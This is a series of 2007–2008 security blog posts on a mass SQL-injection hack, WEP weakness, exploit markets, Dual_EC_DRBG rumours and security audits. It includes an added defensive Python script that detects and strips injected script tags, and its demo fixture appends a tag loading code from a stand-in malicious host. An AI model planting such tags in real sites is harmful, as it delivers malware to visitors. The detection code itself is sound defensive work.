Over 70,000 sites hacked

February 4th, 2008

Late in December 2007, something Roger Thompson of Grisoft characterized as “a pretty good mass hack” compromised tens of thousands of websites, including edu and gov domains, with an automated SQL injection. The hack exploited a Microsoft SQL Server vulnerability that was over a year old, one that was patched in early 2006 by the MS06-014 security update. The hack injected an iterative SQL loop into the databases that appended a JavaScript tag to every column of text. The script instructs browsers reaching the site to execute another script hosted on a malicious server. From what is known, those hacked appeared to share little except a common weak spot in their SQL Server databases. Since those hacked are not bragging about it, the identities of the hackers, as well as their actual purpose, were, and are, unclear.

Although the mass hack was cleaned up in record time, quickly relieving many fears of disastrous consequences, the possibilities from the hack may have been broader than what actually took place. One professional web developer responding on Thompson’s blog anxiously noted, “Looks like exploits for Y! Messenger, IE TIFF overflow and RealPlayer are also in there. Yikes.” Symantec and other experts analyzing the JavaScript itself agreed that the malicious script targeted a RealPlayer bug, one much more recent than the server vulnerability. The RealPlayer bug targeted had been found and fixed in October 2007, only a couple of months before the hack.

Those hacked were not simply at-home users or amateur server owners. According to Thompson, who reported the hack on January 5, 2008, “some victims were pretty sophisticated in terms of security smarts, including, apparently, some Computer Associates pages.” While it appears that no seriously harmful damage resulted from this particular hack, its massive size leaves many users troubled about other equally exploitable bugs that may exist in their own server farms.
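
An added example, not part of the original post: one way a site owner could check for and clean up the kind of injection described above, where a script tag is appended to every text column. It uses an in-memory SQLite database as a stand-in for the affected SQL Server databases; the table, host names and function names are constructed for illustration.

```python
import re
import sqlite3

# A <script src=...></script> tag sitting at the very end of a stored value.
INJECTED = re.compile(
    r"""<script[^>]*\bsrc\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)[^>]*>\s*</script>\s*$""",
    re.IGNORECASE,
)

def text_columns(conn):
    """Yield (table, column) for every CHAR/TEXT column in the database."""
    tables = conn.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall()
    for (table,) in tables:
        cols = conn.execute(f'PRAGMA table_info("{table}")').fetchall()
        for _cid, col, ctype, *_rest in cols:
            if "CHAR" in ctype.upper() or "TEXT" in ctype.upper():
                yield table, col

def find_injected(conn, trusted_hosts=()):
    """Return (table, column, rowid, host) for values ending in an untrusted script tag."""
    hits = []
    for table, col in text_columns(conn):
        # Identifiers come from the schema itself, not from user input.
        query = f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?'
        for rowid, value in conn.execute(query, ("%<script%",)).fetchall():
            m = INJECTED.search(value or "")
            if m and m.group(1).lower() not in trusted_hosts:
                hits.append((table, col, rowid, m.group(1).lower()))
    return hits

def strip_injected(conn, hits):
    """Remove the trailing tag from each flagged value; returns the number of values cleaned."""
    for table, col, rowid, _host in hits:
        (value,) = conn.execute(f'SELECT "{col}" FROM "{table}" WHERE rowid=?', (rowid,)).fetchone()
        conn.execute(f'UPDATE "{table}" SET "{col}"=? WHERE rowid=?', (INJECTED.sub("", value), rowid))
    return len(hits)

def demo():
    """Constructed sample: a small CMS table with a tag appended to two text columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title VARCHAR(80), body TEXT)")
    tag = "<script src=http://malicious.example/x.js></script>"
    conn.executemany("INSERT INTO pages VALUES (?,?,?)", [
        (1, "Home" + tag, "Welcome" + tag),
        (2, "About", '<script src="https://cdn.trusted.example/app.js"></script>'),
    ])
    return conn
```

Cleaning the stored values only removes the symptom; the injection point in the application still has to be closed, or the same loop can be run against the database again.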


Author: Christopher

For Sale: Windows exploits – $20,000

January 19th, 2008

Digital Armaments is running a “Hacker Challenge” to uncover exploitable vulnerabilities in the Microsoft Windows operating system. $20,000 is being offered on top of their normal offer for a Windows vulnerability or exploit. Digital Armaments then sells this information to anyone who subscribes to their vulnerability intelligence service, which ranges from $6,000 to $80,000 a year.


Author: Christopher

Vista randomly insecure?

December 17th, 2007

According to Microsoft’s own MSDN (Microsoft Developer Network) site, the Dual_EC_DRBG random number generator is being added to the future release of Vista Service Pack 1 and to their new server OS, Windows Server 2008. This is newsworthy because there are many rumors that this random number generator contains a back door. A majority of the rumors point to the NSA having the keys to this back door. Encryption based off a random number generator that has been compromised is only a little better than clear text.

A presentation from a few research developers at Microsoft provides some insight on the math, but reading it requires a master’s in advanced mathematics.


Author: Christopher

One Proven Way To Break Into Your Network And Compromise Data

December 9th, 2007

41% of the wireless installations used in business implement WEP (Wired Equivalent Privacy) Wi-Fi security. The largest data breach in the United States is attributed directly to a flaw in WEP security, resulting in the compromise of 94 million payment card numbers.

Vivek Ramachandran of AirTight Networks recently presented a technique to hack WEP in about the time it takes to finish a cup of coffee. Unfortunately, this is one of many documented attacks on the WEP security protocol.

If your business still uses WEP security, it is only a matter of time before your network is breached and your data and intellectual property are compromised.

WPA (Wi-Fi Protected Access) is considered best practice for wireless security, with WPA 2 being even better. If you haven’t already, I highly suggest you upgrade.


Author: Christopher

Top 5 Hacker Attacks – October 2007

November 9th, 2007

Top 5 attacks used by U.S. hackers

  1. Internet Explorer 6 Buffer Overflow
  2. Generic File Inclusion
  3. Mambo register_globals Emulation Layer Overwrite
  4. Microsoft Windows COM Object Handling Vulnerability
  5. Internet Explorer HTML Help Remote Code Execution

Top 5 attacks used by foreign hackers

  1. HTTP overflow attack
  2. Generic File Inclusion
  3. WebDAV Overflow Attempt
  4. Mambo register_globals Emulation Layer Overwrite
  5. phpBB Activity Module File Inclusion

Author: Christopher

95% of Information Security breaches are from known vulnerabilities and misconfigurations

October 28th, 2007

It’s a shocking but true statement.

But then if the vulnerabilities and misconfigurations are known, why are steps not taken to correct them?

Well, the answer lies in the question itself. The vulnerabilities are known, but which ones exist in your own systems and network still needs to be identified. The first step towards protection against security breaches is identification of these vulnerabilities. This is achieved through security audits and vulnerability scans.

A number of people question the need for security audits, and a few people even dismiss them as unnecessary. Some people believe that their anti-virus software can take care of all such security concerns. And it’s astonishing to know that a lot of people either have obsolete anti-virus software that is not updated as frequently as it should be, or their anti-virus software has a poor virus detection rate.

The need for protection varies from business to business. Though powerful anti-virus software might suffice for one business’s security needs, other businesses might require a more sophisticated security solution that comprises protection against malware of all types (malware is short for “malicious software” and includes viruses, Trojans, worms, spyware, and adware).

Security audits involve a thorough analysis of the systems/network and security practices in order to determine the security solution that would best suit the organization. Security audits involve a lot of tests to identify misconfigurations, firewall vulnerability (e.g. due to exposed workstations), password policy, suitability of current anti-virus software, network component (modems, dial pools, etc.) vulnerability, vulnerability of web services, mail databases, etc. You must ensure that your security auditors perform all the relevant security tests and give you a complete and comprehensive security solution.


Author: Christopher